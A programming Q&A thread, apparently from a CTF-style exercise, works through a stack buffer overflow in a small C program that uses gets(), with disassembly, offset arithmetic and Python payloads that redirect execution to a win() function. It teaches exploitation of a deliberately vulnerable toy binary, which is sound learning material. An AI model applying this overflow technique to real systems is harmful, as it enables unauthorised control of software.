gcc assembly x86 buffer-overflow exploit

Buffer overflow: overwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:

xor ch, 0
...
cmp     dword ptr [ebp+10h], 0F00DB4BEh

Now, if I supply two different 4-byte arguments as part of my exploit, e.g. ABCDEFGH (assume ABCD is the first argument and EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):

ABCD\x00\x0d\x00\x00

What happens, however, is that null bytes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d, i.e.:

ABCD\x0d\x00\x00\x00
ABCD\x00\x0d\x00\x00
ABCD\x00\x00\x0d\x00
ABCD\x00\x00\x00\x0d

All of these yield the same behavior.

How can I proceed to only overwrite CH while leaving the rest of ECX as null?

EDIT: see my own answer below. The short version is that bash ignores null bytes and it explains, partially, why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!

Source:

#include <stdio.h>
#include <stdlib.h>

void win(long long arg1, int arg2)
{
    if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
    {
        puts("Close, but not quite.");
        exit(1);
    }

    printf("You win!\n");

}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);

    vuln();
    return 0;
}

The relevant part of objdump's disassembly of the executable is:

080491c2 <win>:
 80491c2:       55                      push   %ebp
 80491c3:       89 e5                   mov    %esp,%ebp
 80491c5:       81 ec 28 01 00 00       sub    $0x128,%esp
 80491cb:       8b 4d 08                mov    0x8(%ebp),%ecx
 80491ce:       89 8d e0 fe ff ff       mov    %ecx,-0x120(%ebp)
 80491d4:       8b 4d 0c                mov    0xc(%ebp),%ecx
 80491d7:       89 8d e4 fe ff ff       mov    %ecx,-0x11c(%ebp)
 80491dd:       8b 8d e0 fe ff ff       mov    -0x120(%ebp),%ecx
 80491e3:       81 f1 55 da b4 14       xor    $0x14b4da55,%ecx
 80491e9:       89 c8                   mov    %ecx,%eax
 80491eb:       8b 8d e4 fe ff ff       mov    -0x11c(%ebp),%ecx
 80491f1:       80 f5 00                xor    $0x0,%ch
 80491f4:       89 ca                   mov    %ecx,%edx
 80491f6:       09 d0                   or     %edx,%eax
 80491f8:       85 c0                   test   %eax,%eax
 80491fa:       75 09                   jne    8049205 <win+0x43>
 80491fc:       81 7d 10 be b4 0d f0    cmpl   $0xf00db4be,0x10(%ebp)
 8049203:       74 1a                   je     804921f <win+0x5d>
 8049205:       83 ec 0c                sub    $0xc,%esp
 8049208:       68 08 a0 04 08          push   $0x804a008
 804920d:       e8 4e fe ff ff          call   8049060 <puts@plt>
 8049212:       83 c4 10                add    $0x10,%esp
 8049215:       83 ec 0c                sub    $0xc,%esp
 8049218:       6a 01                   push   $0x1
 804921a:       e8 51 fe ff ff          call   8049070 <exit@plt>
 804921f:       83 ec 0c                sub    $0xc,%esp
 8049222:       68 1e a0 04 08          push   $0x804a01e
 8049227:       e8 34 fe ff ff          call   8049060 <puts@plt>
 804922c:       83 c4 10                add    $0x10,%esp
 804922f:       83 ec 08                sub    $0x8,%esp
 8049232:       68 27 a0 04 08          push   $0x804a027
 8049237:       68 29 a0 04 08          push   $0x804a029
 804923c:       e8 5f fe ff ff          call   80490a0 <fopen@plt>
 8049241:       83 c4 10                add    $0x10,%esp
 8049244:       89 45 f4                mov    %eax,-0xc(%ebp)
 8049247:       83 7d f4 00             cmpl   $0x0,-0xc(%ebp)
 804924b:       75 12                   jne    804925f <win+0x9d>
 804924d:       83 ec 0c                sub    $0xc,%esp
 8049250:       68 34 a0 04 08          push   $0x804a034
 8049255:       e8 06 fe ff ff          call   8049060 <puts@plt>
 804925a:       83 c4 10                add    $0x10,%esp
 804925d:       eb 31                   jmp    8049290 <win+0xce>
 804925f:       83 ec 04                sub    $0x4,%esp
 8049262:       ff 75 f4                pushl  -0xc(%ebp)
 8049265:       68 00 01 00 00          push   $0x100
 804926a:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
 8049270:       50                      push   %eax
 8049271:       e8 da fd ff ff          call   8049050 <fgets@plt>
 8049276:       83 c4 10                add    $0x10,%esp
 8049279:       83 ec 08                sub    $0x8,%esp
 804927c:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
 8049282:       50                      push   %eax
 8049283:       68 86 a0 04 08          push   $0x804a086
 8049288:       e8 a3 fd ff ff          call   8049030 <printf@plt>
 804928d:       83 c4 10                add    $0x10,%esp
 8049290:       90                      nop
 8049291:       c9                      leave
 8049292:       c3                      ret

08049293 <vuln>:
 8049293:       55                      push   %ebp
 8049294:       89 e5                   mov    %esp,%ebp
 8049296:       83 ec 18                sub    $0x18,%esp
 8049299:       83 ec 0c                sub    $0xc,%esp
 804929c:       68 90 a0 04 08          push   $0x804a090
 80492a1:       e8 8a fd ff ff          call   8049030 <printf@plt>
 80492a6:       83 c4 10                add    $0x10,%esp
 80492a9:       83 ec 0c                sub    $0xc,%esp
 80492ac:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492af:       50                      push   %eax
 80492b0:       e8 8b fd ff ff          call   8049040 <gets@plt>
 80492b5:       83 c4 10                add    $0x10,%esp
 80492b8:       83 ec 08                sub    $0x8,%esp
 80492bb:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492be:       50                      push   %eax
 80492bf:       68 a0 a0 04 08          push   $0x804a0a0
 80492c4:       e8 67 fd ff ff          call   8049030 <printf@plt>
 80492c9:       83 c4 10                add    $0x10,%esp
 80492cc:       90                      nop
 80492cd:       c9                      leave
 80492ce:       c3                      ret

080492cf <main>:
 80492cf:       8d 4c 24 04             lea    0x4(%esp),%ecx
 80492d3:       83 e4 f0                and    $0xfffffff0,%esp
 80492d6:       ff 71 fc                pushl  -0x4(%ecx)
 80492d9:       55                      push   %ebp
 80492da:       89 e5                   mov    %esp,%ebp
 80492dc:       51                      push   %ecx
 80492dd:       83 ec 04                sub    $0x4,%esp
 80492e0:       a1 34 c0 04 08          mov    0x804c034,%eax
 80492e5:       6a 00                   push   $0x0
 80492e7:       6a 02                   push   $0x2
 80492e9:       6a 00                   push   $0x0
 80492eb:       50                      push   %eax
 80492ec:       e8 9f fd ff ff          call   8049090 <setvbuf@plt>
 80492f1:       83 c4 10                add    $0x10,%esp
 80492f4:       e8 9a ff ff ff          call   8049293 <vuln>
 80492f9:       b8 00 00 00 00          mov    $0x0,%eax
 80492fe:       8b 4d fc                mov    -0x4(%ebp),%ecx
 8049301:       c9                      leave
 8049302:       8d 61 fc                lea    -0x4(%ecx),%esp
 8049305:       c3                      ret

Solution

It is unclear why you are focused on the value in ECX or the xor ch, 0 instruction inside the win function. The C code makes it clear that the check for a win requires the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 to be 0xF00DB4BE. When that condition is met, it prints You win!
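
To see why xor ch, 0 does not matter, here is a rough Python model of the comparison as it appears in the disassembly of win. It is only a sketch: the function name win_check and its parameter names are made up for illustration, and the three parameters stand for the dwords at 0x8(%ebp), 0xc(%ebp) and 0x10(%ebp).

```python
MASK32 = 0xFFFFFFFF

def win_check(arg1_lo, arg1_hi, arg2):
    """Hypothetical model of the check in win(), following the disassembly.

    arg1_lo is the dword at 0x8(%ebp), arg1_hi the dword at 0xc(%ebp),
    and arg2 the dword at 0x10(%ebp).
    """
    eax = (arg1_lo ^ 0x14B4DA55) & MASK32    # xor $0x14b4da55,%ecx ; mov %ecx,%eax
    ecx = arg1_hi & MASK32                   # mov -0x11c(%ebp),%ecx
    ch = ((ecx >> 8) & 0xFF) ^ 0x00          # xor $0x0,%ch (changes nothing)
    edx = (ecx & 0xFFFF00FF) | (ch << 8)     # mov %ecx,%edx
    eax |= edx                               # or %edx,%eax
    return eax == 0 and arg2 == 0xF00DB4BE   # test/jne, then cmpl/je

print(win_check(0x14B4DA55, 0x00000000, 0xF00DB4BE))  # True
print(win_check(0x14B4DA55, 0x00000D00, 0xF00DB4BE))  # False
```

In this model ECX simply holds the upper 32 bits of arg1, which must all be zero. Any non-zero byte placed there (such as 0x0d) makes the 64-bit comparison fail.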

We need a buffer exploit that executes the win function and makes it appear that it was passed a 64-bit long long as its first argument and a 32-bit int as its second.

The most obvious way to pull this off is to overrun buf in function vuln so that the input overwrites the return address with the address of win. In the disassembled output, win is at 0x080491c2. We need to write 0x080491c2, followed by a dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (the same as 0x0000000014B4DA55), followed by the 32-bit value 0xF00DB4BE.

The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a call instruction, so we have to make it appear as if one had been done. The goal is to print You win!; whether the program crashes after that isn't relevant.

The return address (win), arg1, and arg2 have to be stored with their bytes in reverse order, since x86 processors are little-endian.
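
As a small illustration of the byte order, Python 3's struct module can pack the three values in little-endian form. The variable names here are only for illustration; the values come from the disassembly and the C source above.

```python
import struct

WIN_ADDR = 0x080491C2  # address of win taken from the objdump output

ret = struct.pack("<I", WIN_ADDR)      # 32-bit little-endian
arg1 = struct.pack("<Q", 0x14B4DA55)   # 64-bit little-endian (long long)
arg2 = struct.pack("<I", 0xF00DB4BE)   # 32-bit little-endian

print(ret.hex())   # c2910408
print(arg1.hex())  # 55dab41400000000
print(arg2.hex())  # beb40df0
```

Note the four trailing 00 bytes in arg1: they are the upper half of the 64-bit value and have to be present in the input.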

The last big question is how many bytes we have to feed to gets to overrun the buffer and reach the return address. You could use trial and error (brute force) to figure this out, but we can look at the disassembly of the call to gets:

 80492ac:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492af:       50                      push   %eax
 80492b0:       e8 8b fd ff ff          call   8049040 <gets@plt>

LEA computes the address (Effective Address) of buf on the stack, and that address is passed as the first argument to gets. 0x18 is 24 in decimal, so buf starts 24 bytes below EBP. Although buf was defined to be 16 bytes in length, the compiler allocated additional space for alignment purposes. We have to add another 4 bytes to account for the saved EBP that the function prologue pushed on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.
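
The arithmetic can be spelled out as a small table of offsets measured from the start of buf. This is only a sketch: the region labels are descriptive names chosen for illustration, and the sizes are the ones derived from the disassembly above.

```python
# (description, size in bytes), in order of increasing address from buf
layout = [
    ("buf plus alignment padding", 0x18),  # lea -0x18(%ebp),%eax
    ("saved EBP of vuln", 4),
    ("return address of vuln (replaced by win)", 4),
    ("fake return address for win", 4),
    ("arg1, 64-bit", 8),
    ("arg2, 32-bit", 4),
]

offsets = {}
pos = 0
for name, size in layout:
    offsets[name] = pos
    print(f"offset {pos:2d}, {size} bytes: {name}")
    pos += size

total = pos
print("total payload length:", total)
```

The return address of vuln lands at offset 28, which is the number of filler bytes needed before the address of win.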

Using Python to generate the input sequence is common in many tutorials. Embedding NUL (\0) characters directly in a shell string may cause the shell to terminate the string prematurely at the NUL byte or to drop the NUL bytes (an issue that people run into with bash). Instead, we can pipe the byte sequence to our program using something like the following (this uses Python 2 print syntax):

python -c 'print "A"*28+"\xc2\x91\x04\x08" \
    +"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname

Where progname is the name of your executable. When run it should appear similar to:

Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault

Note: the 4 bytes making up the return address between the A's and B's are unprintable, so they don't appear in the console output. They are still present, as are all the other unprintable characters.
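
If only Python 3 is available, the print-based one-liner will not emit the intended bytes, because print encodes the string as text. A possible Python 3 equivalent is sketched below. It assumes the same address for win and the same 28-byte offset as above; the function name build_payload and the script name used afterwards are hypothetical.

```python
import struct
import sys

def build_payload():
    """Build the same byte sequence as the one-liner above (hypothetical helper)."""
    padding = b"A" * 28                      # fill buf, padding and saved EBP
    ret = struct.pack("<I", 0x080491C2)      # address of win
    fake_ret = b"B" * 4                      # dummy return address for win
    arg1 = struct.pack("<Q", 0x14B4DA55)     # 64-bit first argument
    arg2 = struct.pack("<I", 0xF00DB4BE)     # 32-bit second argument
    return padding + ret + fake_ret + arg1 + arg2 + b"\n"  # newline ends gets

if __name__ == "__main__":
    # Write raw bytes; sys.stdout.buffer bypasses text encoding.
    sys.stdout.buffer.write(build_payload())
```

Saved as, say, payload.py, it would be run as python3 payload.py | ./progname.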